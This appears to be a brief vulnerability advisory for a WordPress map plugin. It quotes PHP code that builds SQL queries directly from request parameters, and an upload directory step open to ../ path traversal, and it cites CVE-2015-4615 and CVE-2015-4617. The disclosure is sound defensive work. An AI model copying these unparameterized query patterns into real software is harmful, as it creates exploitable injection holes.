Vulnerability

The following lines in Functions.php are vulnerable to SQL injection attack because they are not parameterized or sanitizing user input. 48 $wpdb->query(sprintf("UPDATE $mapsTable 49 SET PolyLines = '%s' 50 WHERE ID = '%s';", $PolyLines, $mapID)); 218 $wpdb->query(sprintf(" 219 UPDATE $mapsTable 220 SET TemplateID = '%s', 221 MapName = '%s', 222 Settings = '%s', 223 CSSValues = '%s', 224 CSSValuesPhoto = '%s', 225 CSSValuesMap = '%s', 226 MapHTML = '%s', 227 IsActive = 1 228 WHERE ID = %s;", 229 $_REQUEST['mapTemplateName'], 230 $_REQUEST['mapName'], 231 urldecode($_REQUEST['mapSettingsXML']), 232 urldecode($_REQUEST["parentCSSXML"]), 233 urldecode($_REQUEST["photoCSSXML"]), 234 urldecode($_REQUEST["mapCSSXML"]), 235 urldecode($_REQUEST["mapHTML"]), $mapID)); 238 //this is a map insert 239 if (!$wpdb->query(sprintf(" 240 INSERT INTO $mapsTable( 241 TemplateID, 242 MapName, 243 DefaultPinImage, 244 Settings, 245 LastInvoked, 246 PolyLines, 247 CSSValues, 248 CSSValuesPhoto, 249 CSSValuesMap, 250 MapHTML, 251 IsActive 252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);", 253 $_REQUEST['mapTemplateName'], 254 $_REQUEST['mapName’] 331 $wpdb->query(sprintf(" 332 UPDATE $mapsTable 333 SET MapName = '%s' 334 IsActive = 1 335 WHERE ID = %s;", 336 $_REQUEST['mapName'], 337 $mapID)); , Also In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters: if (!file_exists($imagesDirectory)) { mkdir($imagesDirectory); } CVE-2015-4615 SQL Injection CVE-2015-4617 Path traversal